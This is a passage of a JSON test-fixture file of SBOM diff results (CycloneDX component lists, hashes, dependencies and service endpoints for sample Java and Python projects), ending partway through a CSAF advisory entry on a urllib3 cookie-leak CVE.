"c0ff5bf3ace7acc1b31fcc109cee48d9eb8f025ae15a31dc91eca760933bdb97c93f05d61e95af1e317859d72e5f179f897f5bf3df0e3810f4212d43bacee4bd"}, {"alg": "SHA-384", "content": "c4ee54d80a2e67e819700051d6cfa01a17631c89f942b8690afb601e491f02d7497fe57bd5c70edfb9b444ae8222b846"}, {"alg": "SHA3-512", "content": "c5e37fe3d9c420a9035f1160eb1d396e94f01851c01c6e2f19f19a221bfc484e63f9660c7377f58aa65246b95a9eb799ac4e6798c0b20f658edf00a4435e1efa"}, {"alg": "SHA3-384", "content": "de0777d2d1d7aad105defb12aed17ef38abfe89db2449c5243fa3c69304ea24dd8df0881330351d0733313e8f7252814"}, {"alg": "SHA-1", "content": "e6cb541461c2834bdea3eb920f1884d1eb508b50"}], "licenses": [{"license": {"id": "CDDL-1.0"}}], "name": "activation", "purl": "pkg:maven/javax.activation/activation@1.1?type=jar", "scope": "required", "version": "1.1"}], "libraries": [{"bom-ref": "pkg:maven/com.piggymetrics/turbine-stream-service@0.0.1-SNAPSHOT?type=jar", "type": "library", "description": "Turbine Stream Service", "group": "com.piggymetrics", "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "turbine-stream-service", "purl": "pkg:maven/com.piggymetrics/turbine-stream-service@0.0.1-SNAPSHOT?type=jar", "version": "0.0.1-SNAPSHOT"}]}, "dependencies": [{"ref": "pkg:maven/javax.activation/activation@1.1?type=jar", "dependsOn": []}]}}, "common_summary": {"components": {"libraries": [{"bom-ref": "pkg:maven/com.fasterxml.jackson.core/jackson-core@2.9.6?type=jar", "type": "library", "description": "Core Jackson processing abstractions (aka Streaming API), implementation for JSON", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\com\\fasterxml\\jackson\\core\\jackson-core\\2.9.6\\jackson-core-2.9.6.jar"}]}}, "group": "com.fasterxml.jackson.core", "hashes": [{"alg": "SHA3-256", "content": "243fdbf974b456d3d96ac5c0d018c3ff2ba6f8dedeea5510da8eb851f2026efb"}, {"alg": "SHA-1", "content": "4e393793c37c77e042ccc7be5a914ae39251b365"}, {"alg": "SHA-384", "content": "59f87a260de53f8ddabe35749cd8abc71e52ebfeacd51b1e68363fe4bf72e632a7ea3648340969e8fdb0eb90d994fff4"}, {"alg": "SHA3-384", "content": "626fc0c5049dde3d55e7b47a935e735bd0dd4aed80d22ba5ec708d581c710702a4a2f4963a1d7870692a77e05d67fd75"}, {"alg": "SHA3-512", "content": "6944f9effea908ae8564a7a1a951a9c7b6e27e7cc978eac30fb43ddef0870103f669065d4b0df7293d5d541f9bf9e04b0cebbf26fdf0159d1dffb6fa465bc64f"}, {"alg": "SHA-512", "content": "a1b9b68b67d442a47e36b46b37b6b0ad7a10c547a1cf7adb4705baec77356e1080049d310b3b530f66bbd3c0ed05cfe43c041d6ef4ffbbc6731149624df4e699"}, {"alg": "MD5", "content": "f3cf83b839fac92307cad542c2ded5c4"}, {"alg": "SHA-256", "content": "fab8746aedd6427788ee390ea04d438ec141bff7eb3476f8bdd5d9110fb2718a"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "jackson-core", "publisher": "FasterXML", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-core@2.9.6?type=jar", "scope": "required", "version": "2.9.6"}, {"bom-ref": "pkg:maven/org.aspectj/aspectjweaver@1.8.13?type=jar", "type": "library", "description": "The AspectJ weaver introduces advices to java classes", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\aspectj\\aspectjweaver\\1.8.13\\aspectjweaver-1.8.13.jar"}]}}, "group": "org.aspectj", "hashes": [{"alg": "MD5", "content": "4a95811a5b41a038a359c05189de9829"}, {"alg": "SHA3-384", "content": "71b931c9517a44ec80139384581067a8d2ebb642d9bae8ce2ad785e6479a1e380ab9d5d5720582bd7d9e2d33c7322571"}, {"alg": "SHA3-256", "content": "8fc704392325ca3d4597055a9e7780b7e2ada5bf63ca1d60a9bbfbc2c6d8f1df"}, {"alg": "SHA-256", "content": "965d0928b0e07dcedb67f0d0a48653d36a6cff257e3270cb28ea48fef6c30a27"}, {"alg": "SHA-384", "content": "a7aa2b3cbd2abc4264f69e97e70e202c24d8fa2c67376cd1c16731fecee57b518cd41c45c0288e036100c6a7c53750ec"}, {"alg": "SHA-1", "content": "ad94df2a28d658a40dc27bbaff6a1ce5fbf04e9b"}, {"alg": "SHA-512", "content": "be2b21636f7e6786c9c3c50684e522520d6bc0580ce49ff8a9c0fbe422568acbb91fd70dde63a3624098ba10d4e3892f2de0ffaa05f595278d2726b44e6aa576"}, {"alg": "SHA3-512", "content": "e5d1354f72fcaf1018ff248554491077e8037c116ee6f66d98f49f290f17417bb0d73f18775f00717978755ea44533c95d13011217531d065ac3f15b9c582d7a"}], "licenses": [{"license": {"id": "EPL-1.0"}}], "name": "aspectjweaver", "purl": "pkg:maven/org.aspectj/aspectjweaver@1.8.13?type=jar", "scope": "required", "version": "1.8.13"}], "frameworks": [{"bom-ref": "pkg:maven/org.bouncycastle/bcpkix-jdk15on@1.56?type=jar", "type": "framework", "description": "The Bouncy Castle Java APIs for CMS, PKCS, EAC, TSP, CMP, CRMF, OCSP, and certificate generation. This jar contains APIs for JDK 1.5 to JDK 1.8. The APIs can be used in conjunction with a JCE/JCA provider such as the one provided with the Bouncy Castle Cryptography APIs.", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\bouncycastle\\bcpkix-jdk15on\\1.56\\bcpkix-jdk15on-1.56.jar"}]}}, "group": "org.bouncycastle", "hashes": [{"alg": "MD5", "content": "17b2b704b3ad9b36a6fca1ace60a2a06"}, {"alg": "SHA-1", "content": "4648af70268b6fdb24674fb1fd7c1fcc73db1231"}, {"alg": "SHA-512", "content": "6cbc73005b662440c395d81d44d0f52a3e20550f64be3d4fe413c344257c6ef31f8080421b247273f8be42e724de370b1f1b2f0dae58a47010ef4c890d8cf5b8"}, {"alg": "SHA-256", "content": "7043dee4e9e7175e93e0b36f45b1ec1ecb893c5f755667e8b916eb8dd201c6ca"}, {"alg": "SHA-384", "content": "8147d3692b03ac84ccdd20f8ff7f3d319583434ad1a0178ab31d6433a3ed11c6e05967b26bbaf0420f400a32fb5941c5"}, {"alg": "SHA3-384", "content": "899934416d5f5c3cfe0377b41d1403730c760b6d9edec6079e73a70ec8b92616055c37fb1fee3b227a6dae360cd9cc65"}, {"alg": "SHA3-512", "content": "a6f07a263da0a69665d916d9b41f42d74061630c5ff83e8c407fa3b9aa47708c23a0a3c3c2b9f953af66b60374556c8e89eed2bb7ff3176fc4f603f957f0fffa"}, {"alg": "SHA3-256", "content": "e57c428533d3222b66f93c6bd530ee3bd0e4584c32d5ad50424072f6e8de2d98"}], "licenses": [{"license": {"name": "Bouncy Castle Licence", "url": "http://www.bouncycastle.org/licence.html"}}], "name": "bcpkix-jdk15on", "purl": "pkg:maven/org.bouncycastle/bcpkix-jdk15on@1.56?type=jar", "scope": "required", "version": "1.56"}, {"bom-ref": "pkg:maven/org.springframework.cloud/spring-cloud-context@2.0.0.RELEASE?type=jar", "type": "framework", "description": "Spring Cloud Context", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\cloud\\spring-cloud-context\\2.0.0.RELEASE\\spring-cloud-context-2.0.0.RELEASE.jar"}]}, "occurrences": [{"location": "notification-service\\src\\main\\java\\com\\piggymetrics\\notification\\service\\EmailServiceImpl.java#22"}]}, "group": "org.springframework.cloud", "hashes": [{"alg": "SHA3-256", "content": "2074e427d7cda1199ef40962370de1dd1b3163c33ce9254a9e0b38a7667dc4bf"}, {"alg": "SHA3-512", "content": "2f05d0c7c31bbac1336e5f37fdcdcdc7bf022a369faaa5c59a2733c8174022a7848492c8faad3fb483c7dce78210cc67465ce68b766b8155652d58d6f206149c"}, {"alg": "SHA-1", "content": "3f0d28344c0dc74eb8594f3f3dd6f82c687be198"}, {"alg": "SHA3-384", "content": "96c8275ce24cc07a8d9311075e667c44a1d9f032993e58be7f9632951a91744b96b118e5db3b0a9882f8d145a7e40f13"}, {"alg": "SHA-384", "content": "96ff50360c1b03d6e225c5975405ce714464cacbbd77896c7841bbf47a14660970b13d2d11d7af1c7396ec4b0e9238e9"}, {"alg": "SHA-256", "content": "abb111a850530a2d9174939f9ef6424efa4abecf978e5625915aa84ea17bb9fe"}, {"alg": "SHA-512", "content": "c5bcf7518bb6bafc311af1e14db61f5fdcdb56e24658da1481e8806e5ad7c897e4def752b9af7d9df1e6cd998300f4f0881593e4b961827c33777c7cbcb6fb44"}, {"alg": "MD5", "content": "e7a4e7275f373c6167b7590591c19efd"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-cloud-context", "publisher": "Pivotal Software, Inc.", "purl": "pkg:maven/org.springframework.cloud/spring-cloud-context@2.0.0.RELEASE?type=jar", "scope": "required", "version": "2.0.0.RELEASE"}, {"bom-ref": "pkg:maven/org.springframework.cloud/spring-cloud-starter-config@2.0.0.RELEASE?type=jar", "type": "framework", "description": "Spring Cloud Starter", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\cloud\\spring-cloud-starter-config\\2.0.0.RELEASE\\spring-cloud-starter-config-2.0.0.RELEASE.jar"}]}}, "group": "org.springframework.cloud", "hashes": [{"alg": "SHA-512", "content": "323078a561ef0cd2ab514801fe8604a3c16b2ae43c1bf92ad32d0abec780e0f9b557a781da1d6a9c56a225e77ef9cca3987246b3f43fbb7a5e2998caab392b8f"}, {"alg": "SHA-1", "content": "42f8c6a92ef1a09239e38a1cf65293ffde1b181c"}, {"alg": "SHA-256", "content": "5342438a378e975b8ecd228eb33f527a96267ab75bd4e5c8a0bbdc729a9f95a9"}, {"alg": "MD5", "content": "5d514c991ae9344ed41c50b6cce19bdc"}, {"alg": "SHA3-512", "content": "6736c58d38d47072eb084233062b0ea96b3b0ff66a4c4e8a4c2f3349d07a7091933abf05fda7a7660474520f7bb75c66d2c98fa9c488f98fe452d5dac132483a"}, {"alg": "SHA3-256", "content": "77acab1bc1c472b4f2d3dbadab3d278c827a967db51a6ca6d2046e1b6fc469f7"}, {"alg": "SHA-384", "content": "d1c7ef45846e4bf3e0b69131d80102d5be8e9413d40a00aebecb4461ef59b06cd52c05ae68777592a9689713b92f64b7"}, {"alg": "SHA3-384", "content": "eb6590405d9ff1dcf6b729bb561230598adf7893d61c1a46c5ae6f65974e3a3550b2b480628b656ea765be6fba9a8102"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-cloud-starter-config", "publisher": "Pivotal Software, Inc.", "purl": "pkg:maven/org.springframework.cloud/spring-cloud-starter-config@2.0.0.RELEASE?type=jar", "scope": "required", "version": "2.0.0.RELEASE"}, {"bom-ref": "pkg:maven/org.springframework.cloud/spring-cloud-starter@2.0.0.RELEASE?type=jar", "type": "framework", "description": "Spring Cloud Starter", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\cloud\\spring-cloud-starter\\2.0.0.RELEASE\\spring-cloud-starter-2.0.0.RELEASE.jar"}]}}, "group": "org.springframework.cloud", "hashes": [{"alg": "SHA-1", "content": "0247ea27d9483e9806f539f6031af135a6a3645f"}, {"alg": "MD5", "content": "4d031dc9879546e189c6c914c19c0542"}, {"alg": "SHA3-512", "content": "5dc4e0e8e5f8e8154aeb362d6018a6d6d3507f4b3d60a3cf51d9ae80e17a9b5a300ff26ac1b508e1ab13c569ae572e94c443e4ca1c92edd48771a7fe5287b1bd"}, {"alg": "SHA-256", "content": "670eedd14018f52145cd58de663739657a19e0e1a7ad965cf7e0a99dd37e84e4"}, {"alg": "SHA-512", "content": "8187b1a499b98e9a2e44bdfa3bca5088ee8034bce371c014b5fd4b1c2240f3447562ba74987b3d91552d45e6c2349942342133ab6bc8e2ba4330257ad63b2f3b"}, {"alg": "SHA-384", "content": "a42de307261711df91fd860690834edf0c28144e820ed8c513c3ec606ffc7728d3ff0496272b55944fbcce4ba7c79675"}, {"alg": "SHA3-256", "content": "d43f97976acafc9bcb47ccece04ef74ab61a6faddfea7ff5cae7c3c1acaedce5"}, {"alg": "SHA3-384", "content": "dba2c320469b2d423fae76fc68a0b57f4d5f7da17f2c7b44c41b7654bbb8395b7e669c538384728e2e65824e8864b501"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-cloud-starter", "publisher": "Pivotal Software, Inc.", "purl": "pkg:maven/org.springframework.cloud/spring-cloud-starter@2.0.0.RELEASE?type=jar", "scope": "required", "version": "2.0.0.RELEASE"}, {"bom-ref": "pkg:maven/org.springframework.security/spring-security-rsa@1.0.5.RELEASE?type=jar", "type": "framework", "description": "Spring Security RSA is a small utility library for RSA ciphers. It belongs to the family of Spring Security crypto libraries that handle encoding and decoding text as a general, useful thing to be able to do.", "evidence": {"callstack": {"frames": [{"fullFilename": "auth-service\\src\\main\\java\\com\\piggymetrics\\auth\\config\\WebSecurityConfig.java", "function": "authenticationManagerBean", "line": 38, "module": "com.piggymetrics.auth.config.WebSecurityConfig", "package": "com.piggymetrics.auth.config"}, {"column": 16, "fullFilename": "auth-service\\src\\main\\java\\com\\piggymetrics\\auth\\config\\WebSecurityConfig.java", "function": "authenticationManagerBean", "line": 41, "module": "com.piggymetrics.auth.config.WebSecurityConfig", "package": "com.piggymetrics.auth.config"}, {"column": 16, "fullFilename": "auth-service\\src\\main\\java\\com\\piggymetrics\\auth\\config\\WebSecurityConfig.java", "function": "authenticationManagerBean", "line": 41, "module": "com.piggymetrics.auth.config.WebSecurityConfig", "package": "com.piggymetrics.auth.config"}, {"column": 9, "fullFilename": "auth-service\\src\\main\\java\\com\\piggymetrics\\auth\\config\\WebSecurityConfig.java", "function": "authenticationManagerBean", "line": 41, "module": "com.piggymetrics.auth.config.WebSecurityConfig", "package": "com.piggymetrics.auth.config"}]}, "identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\security\\spring-security-rsa\\1.0.5.RELEASE\\spring-security-rsa-1.0.5.RELEASE.jar"}]}}, "group": "org.springframework.security", "hashes": [{"alg": "SHA-1", "content": "31bd1111ada2f455eb0f492ed09e39deda18ca99"}, {"alg": "SHA3-512", "content": "60338f31c9984f232abb52affe0025bb4f8380a71b754d8f5f686360339985d6015f995299d73a8cf4a9eac743cfc9cc141b9de0c672d4743b2740539b497e0a"}, {"alg": "SHA-384", "content": "74af3ef26d098d1c4954e5c4d8cf19391ea1788eaa06cf4d4176d7fd7008d7b34ef594e384c480966cf3e6fd1a57df9e"}, {"alg": "MD5", "content": "88d25c857040132ad991af650dcb5e9e"}, {"alg": "SHA-512", "content": "9613e84294a7d0486d6f9529a614526b1b9e37c17c7a1f8c59baa418fe04eb5f09163ef31a7e29b59673bb899bfeaa1d9b99daf91a70dec0a3f761e12da7c284"}, {"alg": "SHA3-384", "content": "ae5b96fd3c5ef3c12bfc91cd6b74fea4d0371ebeed79ff8de1c219b6689ed878c3dde01fb90c34a0163681d234e7a9d2"}, {"alg": "SHA3-256", "content": "cfb4a0c1fee534a26992a7f7adf569b07b5e1190338adf77639afd384c20f2d3"}, {"alg": "SHA-256", "content": "db764286a058f85ac06df00c254afd8d63c618db5abc962a6bdb5f440cb2e5d6"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-security-rsa", "publisher": "SpringSource", "purl": "pkg:maven/org.springframework.security/spring-security-rsa@1.0.5.RELEASE?type=jar", "scope": "required", "version": "1.0.5.RELEASE"}]}, "dependencies": [{"ref": "pkg:maven/com.piggymetrics/turbine-stream-service@0.0.1-SNAPSHOT?type=jar", "dependsOn": ["pkg:maven/org.springframework.boot/spring-boot-starter-test@2.0.3.RELEASE?type=jar", "pkg:maven/org.springframework.cloud/spring-cloud-starter-config@2.0.0.RELEASE?type=jar", "pkg:maven/org.springframework.cloud/spring-cloud-starter-netflix-eureka-client@2.0.0.RELEASE?type=jar", "pkg:maven/org.springframework.cloud/spring-cloud-starter-netflix-turbine-stream@2.0.0.RELEASE?type=jar", "pkg:maven/org.springframework.cloud/spring-cloud-starter-stream-rabbit@2.0.0.RELEASE?type=jar"]}, {"ref": "pkg:maven/org.springframework.boot/spring-boot-starter@2.0.3.RELEASE?type=jar", "dependsOn": ["pkg:maven/javax.annotation/javax.annotation-api@1.3.2?type=jar", "pkg:maven/org.springframework.boot/spring-boot-autoconfigure@2.0.3.RELEASE?type=jar", "pkg:maven/org.springframework.boot/spring-boot-starter-logging@2.0.3.RELEASE?type=jar", "pkg:maven/org.springframework.boot/spring-boot@2.0.3.RELEASE?type=jar", "pkg:maven/org.springframework/spring-core@5.0.7.RELEASE?type=jar", "pkg:maven/org.yaml/snakeyaml@1.19?type=jar"]}, {"ref": "pkg:maven/org.springframework.cloud/spring-cloud-starter-config@2.0.0.RELEASE?type=jar", "dependsOn": ["pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.6?type=jar", "pkg:maven/org.springframework.cloud/spring-cloud-config-client@2.0.0.RELEASE?type=jar", "pkg:maven/org.springframework.cloud/spring-cloud-starter@2.0.0.RELEASE?type=jar"]}, {"ref": "pkg:maven/org.springframework.cloud/spring-cloud-starter@2.0.0.RELEASE?type=jar", "dependsOn": ["pkg:maven/org.springframework.boot/spring-boot-starter@2.0.3.RELEASE?type=jar", "pkg:maven/org.springframework.cloud/spring-cloud-commons@2.0.0.RELEASE?type=jar", "pkg:maven/org.springframework.cloud/spring-cloud-context@2.0.0.RELEASE?type=jar", "pkg:maven/org.springframework.security/spring-security-rsa@1.0.5.RELEASE?type=jar"]}], "services": [{"name": "com-piggymetrics-account-client-AuthServiceClient-createUser-service", "endpoints": ["/uaa/users"], "authenticated": true, "x-trust-boundary": true}, {"name": "com-piggymetrics-account-client-StatisticsServiceClient-updateStatistics-service", "endpoints": ["/statistics/{accountName}"]}, {"name": "com-piggymetrics-account-controller-AccountController-createNewAccount-service", "endpoints": ["/"]}, {"name": "com-piggymetrics-statistics-controller-StatisticsController-getCurrentAccountStatistics-service", "endpoints": ["/current"]}, {"name": "com-piggymetrics-statistics-controller-StatisticsController-getStatisticsByAccountName-service", "endpoints": ["/{accountName}"], "authenticated": true, "x-trust-boundary": true}, {"name": "com-piggymetrics-statistics-controller-StatisticsController-saveAccountStatistics-service", "endpoints": ["/{accountName}"], "authenticated": true, "x-trust-boundary": true}], "bomFormat": "CycloneDX", "metadata": {"authors": [{"name": "OWASP Foundation"}], "component": {"bom-ref": "pkg:maven/com.piggymetrics/turbine-stream-service@0.0.1-SNAPSHOT?type=jar", "description": "Turbine Stream Service", "externalReferences": [{"type": "vcs", "url": "https://github.com/spring-projects/spring-boot/spring-boot-starter-parent/piggymetrics/turbine-stream-service"}, {"type": "website", "url": "https://projects.spring.io/spring-boot/#/spring-boot-starter-parent/piggymetrics/turbine-stream-service"}], "group": "com.piggymetrics", "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "turbine-stream-service", "purl": "pkg:maven/com.piggymetrics/turbine-stream-service@0.0.1-SNAPSHOT?type=jar", "type": "library", "version": "0.0.1-SNAPSHOT"}, "tools": {"components": [{"author": "OWASP Foundation", "group": "@cyclonedx", "name": "cdxgen", "publisher": "OWASP Foundation", "type": "application"}]}}, "specVersion": "1.5", "version": 3}}, "result_5": {"diff_summary": {"bom_1.json": {}, "bom_2.json": {}}, "common_summary": {"components": {"libraries": [{"bom-ref": "pkg:pypi/requests@2.31.0", "type": "library", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "/home/runner/work/src_repos/python/django-goat/requirements_tests.txt"}]}}, "name": "requests", "properties": [{"name": "SrcFile", "value": "/home/runner/work/src_repos/python/django-goat/requirements_tests.txt"}], "purl": "pkg:pypi/requests@2.31.0", "version": "2.31.0"}]}}}, "result_6": {"test/sbom-python.json": {"components": [{"version": "1.0.1"}, {"version": "2.11.3"}, {"bom-ref": "pkg:pypi/markupsafe@1.1.1", "name": "MarkupSafe", "purl": "pkg:pypi/markupsafe@1.1.1", "version": "1.1.1"}, {"bom-ref": "pkg:pypi/itsdangerous@1.1.0", "name": "itsdangerous", "purl": "pkg:pypi/itsdangerous@1.1.0", "version": "1.1.0"}, {"bom-ref": "pkg:pypi/click@7.1.2", "name": "click", "purl": "pkg:pypi/click@7.1.2", "version": "7.1.2"}], "dependencies": [{"ref": "pkg:pypi/itsdangerous@1.1.0"}, {"ref": "pkg:pypi/click@7.1.2"}, {"dependsOn": ["pkg:pypi/click@7.1.2", "pkg:pypi/itsdangerous@1.1.0", "pkg:pypi/jinja2@2.11.3", "pkg:pypi/werkzeug@1.0.1"], "ref": "pkg:pypi/flask@1.1.2"}], "services": [{"endpoints": ["/create_user"], "name": "users-service"}]}, "test/sbom-python2.json": {"components": [{"version": "1.5.1"}, {"version": "2.10.2"}]}}, "result_7": {"bomFormat": "CycloneDX", "components": [{"bom-ref": "pkg:pypi/flask@1.1.2", "evidence": {"identity": {"confidence": 1, "field": "purl", "methods": [{"confidence": 1, "technique": "instrumentation", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\venv"}]}, "occurrences": [{"location": "flask_webgoat\\__init__.py#20"}, {"location": "flask_webgoat\\actions.py#13"}, {"location": "flask_webgoat\\actions.py#16"}, {"location": "flask_webgoat\\actions.py#19"}, {"location": "flask_webgoat\\actions.py#22"}, {"location": "flask_webgoat\\actions.py#34"}, {"location": "flask_webgoat\\actions.py#4"}, {"location": "flask_webgoat\\actions.py#46"}, {"location": "flask_webgoat\\actions.py#49"}, {"location": "flask_webgoat\\actions.py#6"}, {"location": "flask_webgoat\\actions.py#7"}, {"location": "flask_webgoat\\auth.py#13"}, {"location": "flask_webgoat\\auth.py#23"}, {"location": "flask_webgoat\\auth.py#25"}, {"location": "flask_webgoat\\auth.py#35"}, {"location": "flask_webgoat\\auth.py#4"}, {"location": "flask_webgoat\\auth.py#44"}, {"location": "flask_webgoat\\auth.py#46"}, {"location": "flask_webgoat\\status.py#13"}, {"location": "flask_webgoat\\status.py#3"}, {"location": "flask_webgoat\\status.py#8"}, {"location": "flask_webgoat\\ui.py#14"}, {"location": "flask_webgoat\\ui.py#19"}, {"location": "flask_webgoat\\ui.py#24"}, {"location": "flask_webgoat\\ui.py#6"}, {"location": "flask_webgoat\\users.py#14"}, {"location": "flask_webgoat\\users.py#18"}, {"location": "flask_webgoat\\users.py#24"}, {"location": "flask_webgoat\\users.py#3"}, {"location": "flask_webgoat\\users.py#33"}, {"location": "flask_webgoat\\users.py#44"}, {"location": "flask_webgoat\\users.py#46"}, {"location": "flask_webgoat\\users.py#7"}]}, "name": "flask", "properties": [{"name": "ImportedModules", "value": "flask.redirect,flask.render_template,flask.jsonify,flask.Blueprint,flask.session,flask.g,flask.request,flask.Flask"}], "purl": "pkg:pypi/flask@1.1.2", "type": "framework", "version": "1.1.2"}, {"bom-ref": "pkg:pypi/werkzeug@1.0.1", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "name": "Werkzeug", "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "purl": "pkg:pypi/werkzeug@1.0.1", "type": "library"}, {"bom-ref": "pkg:pypi/jinja2@2.11.3", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "name": "Jinja2", "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "purl": "pkg:pypi/jinja2@2.11.3", "type": "library"}, {"evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "type": "library"}, {"evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "type": "library"}, {"evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "type": "library"}, {"bom-ref": "pkg:github/actions/checkout@v2", "group": "actions", "name": "checkout", "purl": "pkg:github/actions/checkout@v2", "type": "application", "version": "v2"}, {"bom-ref": "pkg:github/actions/setup-python@v2", "group": "actions", "name": "setup-python", "purl": "pkg:github/actions/setup-python@v2", "type": "application", "version": "v2"}], "dependencies": [{"dependsOn": ["pkg:pypi/flask@1.1.2"], "ref": "pkg:pypi/flask-webgoat@latest"}, {"dependsOn": [], "ref": "pkg:pypi/werkzeug@1.0.1"}, {"dependsOn": ["pkg:pypi/markupsafe@1.1.1"], "ref": "pkg:pypi/jinja2@2.11.3"}, {"dependsOn": [], "ref": "pkg:pypi/markupsafe@1.1.1"}, {"dependsOn": []}, {"dependsOn": []}], "metadata": {"authors": [{"name": "OWASP Foundation"}], "component": {"bom-ref": "pkg:gem/flask-webgoat@latest", "name": "flask-webgoat", "purl": "pkg:gem/flask-webgoat@latest", "type": "application", "version": "latest"}, "lifecycles": [{"phase": "build"}], "tools": {"components": [{"author": "OWASP Foundation", "bom-ref": "pkg:npm/@cyclonedx/cdxgen@10.2.1", "group": "@cyclonedx", "name": "cdxgen", "publisher": "OWASP Foundation", "purl": "pkg:npm/%40cyclonedx/cdxgen@10.2.1", "type": "application", "version": "10.2.1"}]}}, "services": [{"authenticated": false, "endpoints": ["/grep_processes", "/message"], "name": "actions-service"}, {"authenticated": false, "endpoints": ["/login", "/login_and_redirect"], "name": "auth-service"}, {"authenticated": false, "endpoints": ["/ping", "/status"], "name": "status-service"}, {"authenticated": false, "endpoints": ["/search"], "name": "ui-service"}, {"authenticated": false}], "specVersion": "1.5", "version": 2}, "result_8": {"components": [{"version": "1.0.1"}, {"version": "2.11.3"}, {"bom-ref": "pkg:pypi/markupsafe@1.1.1", "name": "MarkupSafe", "purl": "pkg:pypi/markupsafe@1.1.1", "version": "1.1.1"}, {"bom-ref": "pkg:pypi/itsdangerous@1.1.0", "name": "itsdangerous", "purl": "pkg:pypi/itsdangerous@1.1.0", "version": "1.1.0"}, {"bom-ref": "pkg:pypi/click@7.1.2", "name": "click", "purl": "pkg:pypi/click@7.1.2", "version": "7.1.2"}], "dependencies": [{"ref": "pkg:pypi/itsdangerous@1.1.0"}, {"ref": "pkg:pypi/click@7.1.2"}, {"dependsOn": ["pkg:pypi/click@7.1.2", "pkg:pypi/itsdangerous@1.1.0", "pkg:pypi/jinja2@2.11.3", "pkg:pypi/werkzeug@1.0.1"], "ref": "pkg:pypi/flask@1.1.2"}], "services": [{"endpoints": ["/create_user"], "name": "users-service"}]}, "result_9": {"components": [{"version": "1.5.1"}, {"version": "2.10.2"}]}, "result_13": {"diff_summary": {"test/csaf_1.json": {"vulnerabilities": [{"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2023-43804"]}], "cve": "CVE-2023-43804", "cwe": {"id": "200", "name": "Exposure of Sensitive Information to an Unauthorized Actor"}, "discovery_date": "2023-10-02T23:27:05", "ids": [{"system_name": "CVE Record", "text": "CVE-2023-43804"}, {"system_name": "GitHub Advisory", "text": "GHSA-v845-jxx5-vc9f"}, {"system_name": "GitHub Advisory", "text": "PYSEC-2023-192"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# `Cookie` HTTP header isn't stripped on cross-origin redirects urllib3 doesn't treat the `Cookie` HTTP header special or provide any helpers for managing cookies over HTTP, that is the responsibility of the user. However, it is possible for a user to specify a `Cookie` header and unknowingly leak information via HTTP redirects to a different origin if that user doesn't disable redirects explicitly.  Users **must** handle redirects themselves instead of relying on urllib3's automatic redirects to achieve safe processing of the `Cookie` header, thus we decided to strip the header by default in order to further protect users who aren't using the correct approach.  ## Affected usages  We believe the number of usages affected by this advisory is low. It requires all of the following to be true to be exploited:  * Using an affected version of urllib3 (patched in v1.26.17 and v2.0.6) * Using the `Cookie` header on requests, which is mostly typical for impersonating a browser. * Not disabling HTTP redirects * Either not using HTTPS or for the origin server to redirect to a malicious origin.  ## Remediation  * Upgrading to at least urllib3 v1.26.17 or v2.0.6 * Disabling HTTP redirects using `redirects=False` when sending 